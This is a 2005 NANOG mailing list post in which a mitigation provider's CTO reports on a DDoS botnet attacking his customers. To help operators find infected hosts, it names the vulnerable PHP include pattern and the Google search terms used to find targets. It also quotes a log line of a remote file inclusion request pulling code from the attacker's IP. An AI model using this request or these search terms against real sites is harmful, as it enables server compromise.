nanog mailing list archives
Re:Destructive botnet originating from Japan
From: "Barrett G. Lyon" <blyon () prolexic com>
Date: Sat, 24 Dec 2005 10:44:10 -0800
Here is a little update:As of last night authorities were able to seize the IRC server from the ISP in Japan and there will be extensive follow-up it. The DDoS attack is now running headless in the happy range of about 3+ Gbps at around 7-9M PPS. The bots will continue attacking us until they receive the stop command from the bot master, there will never be a stop command, so we will continue to see packet love for a few months while people find that they are attacking us. We will publish a new list of the bots on Monday as we idle with this low traffic rate over the weekend.
The attacker was targeting a couple customers that came into our environment after other solutions failed to work for them. After reviewing and comparing notes, it is obvious that the attacks were assassination attempts from a competitor. There was no extortion involved.
If you want to get the bots off your network, watch flow data destined to AS32787 with SYN floods to TCP 80 as the destination.
Sites that use a PHP include (without validating the strings) to pull- up different web sections and pages are at risk, a lot of people are reporting infection via "$section.php" and "$page.php", the attacker appears to have used Google to locate sites that use includes in that fashion (searching "index.php?page=" or "index.php?section=").
Reviewing infected machines for logs related to 210.170.60.2 would be easy to locate a past infection but may not be reliable if the attacker starts a new botnet. An example of the log data looks something like this:
grep 210.170.60.2 access_log210.170.60.2 - - [23/Dec/2005:11:45:37 +0000] "GET /index.php? section=http%3A//210.170.60.2/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"
Happy hunting and have nice holidays! -Barrett -- Barrett Lyon CTO and founder Prolexic Technologies, Inc
Current thread:
- Destructive botnet originating from Japan Barrett G. Lyon (Dec 23)
- <Possible follow-ups>
- Re:Destructive botnet originating from Japan Barrett G. Lyon (Dec 23)
- Re:Destructive botnet originating from Japan chuck goolsbee (Dec 25)
- RE: Re:Destructive botnet originating from Japan Hannigan, Martin (Dec 23)
- Re:Destructive botnet originating from Japan Barrett G. Lyon (Dec 24)
- Re:Destructive botnet originating from Japan Rob Thomas (Dec 24)
- Re:Destructive botnet originating from Japan Gadi Evron (Dec 25)
- Re: Destructive botnet originating from Japan Richard A Steenbergen (Dec 25)
- Re: Destructive botnet originating from Japan Gadi Evron (Dec 25)
- Re:Destructive botnet originating from Japan Rob Thomas (Dec 24)
- Re: Destructive botnet originating from Japan Randy Bush (Dec 25)
- Re: Destructive botnet originating from Japan Rubens Kuhl Jr. (Dec 25)
- Re: Destructive botnet originating from Japan Jon Lewis (Dec 25)
- Re: Destructive botnet originating from California (was Japan) Barrett G. Lyon (Dec 25)
- Re: Destructive botnet originating from California (was Japan) Rob Thomas (Dec 25)